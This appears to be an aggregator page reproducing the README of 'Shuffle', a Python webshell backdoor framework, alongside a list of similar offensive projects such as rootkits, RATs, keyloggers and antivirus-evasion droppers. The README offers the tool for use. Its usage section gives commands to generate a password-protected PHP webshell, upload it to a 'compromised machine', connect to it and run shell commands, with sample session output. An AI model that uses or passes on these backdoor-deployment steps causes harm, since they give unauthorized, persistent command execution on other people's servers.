All Projects → matiasmenares → Shuffle

matiasmenares / Shuffle

Licence: gpl-3.0
WebShell Backdoor Framework

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Shuffle

Dr0p1t Framework
A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks
Stars: ✭ 1,132 (+10190.91%)
Mutual labels:  hacking, hacking-tool, backdoor
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+6490.91%)
Mutual labels:  hacking, hacking-tool, backdoor
Powershell Rat
Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.
Stars: ✭ 636 (+5681.82%)
Mutual labels:  hacking, hacking-tool, backdoor
Phpsploit
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Stars: ✭ 1,188 (+10700%)
Mutual labels:  hacking, backdoor, webshell
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (+1190.91%)
Mutual labels:  hacking, hacking-tool, backdoor
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
Stars: ✭ 387 (+3418.18%)
Mutual labels:  hacking, hacking-tool, backdoor
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (+1590.91%)
Mutual labels:  hacking, hacking-tool, backdoor
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (+3490.91%)
Mutual labels:  hacking, hacking-tool, backdoor
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+53936.36%)
Mutual labels:  hacking, backdoor
Keylogger
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Stars: ✭ 604 (+5390.91%)
Mutual labels:  hacking, hacking-tool
Jok3r
Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework
Stars: ✭ 645 (+5763.64%)
Mutual labels:  hacking, hacking-tool
Daws
Advanced Web Shell
Stars: ✭ 551 (+4909.09%)
Mutual labels:  hacking, webshell
Impulse
💣 Impulse Denial-of-service ToolKit
Stars: ✭ 538 (+4790.91%)
Mutual labels:  hacking, hacking-tool
Dirsearch
Web path scanner
Stars: ✭ 7,246 (+65772.73%)
Mutual labels:  hacking, hacking-tool
Lockdoor Framework
🔐 Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources
Stars: ✭ 677 (+6054.55%)
Mutual labels:  hacking, hacking-tool
Xattacker
X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
Stars: ✭ 897 (+8054.55%)
Mutual labels:  hacking, hacking-tool
Onex
onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Termux and other Linux distributions. onex can install any third party tool or any hacking tool for you.
Stars: ✭ 537 (+4781.82%)
Mutual labels:  hacking, hacking-tool
Hacktheworld
An Python Script For Generating Payloads that Bypasses All Antivirus so far .
Stars: ✭ 527 (+4690.91%)
Mutual labels:  hacking, backdoor
Vhostscan
A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
Stars: ✭ 767 (+6872.73%)
Mutual labels:  hacking, hacking-tool
Interlace
Easily turn single threaded command line applications into a fast, multi-threaded application with CIDR and glob support.
Stars: ✭ 760 (+6809.09%)
Mutual labels:  hacking, hacking-tool

Shuffle Logo

Code Climate

Version

0.2 (Beta)

Installation

Only you need is Python 2.7

Clone repository

$ git clone https://github.com/matiasmenares/Shuffle

Getting started

Shuffle 0.1 (Beta) works with Python 2.7 You can run it with:

$ python shuffle.py -h

Command:

  • -g Generate shell
  • -p Setting Password
  • -u Url to connect

To create a webshell run:

$ python shuffle.py -g webshell.php -p h4x0r

And Webshell generate in shuffle folder.

~/shuffle/out/webshell.php

Connecting

When you upload shell to compromise machine only you need is run shell with:

$ python shuffle.py -u http://localhost/webshell.php -p h4x0r

And wait to establish connection...

#> Conecction Established, Enjoy!

[email protected][~]$>

Now you can run all command !

#> Conecction Established, Enjoy!

[email protected][~]$> ls
app
lib
index.php
[email protected][~]$> 

to close the conection type exit.

[email protected][~]$> exit
#> Connection Closet by user.
$ 

Extras

Banner

if you want change login banner modify this file:

~/shuffle/extras/banner.txt

How to Contributing?

  1. Fork it
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create new Pull Request

Done!

License

GNU

Free Software, Hell Yeah!

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].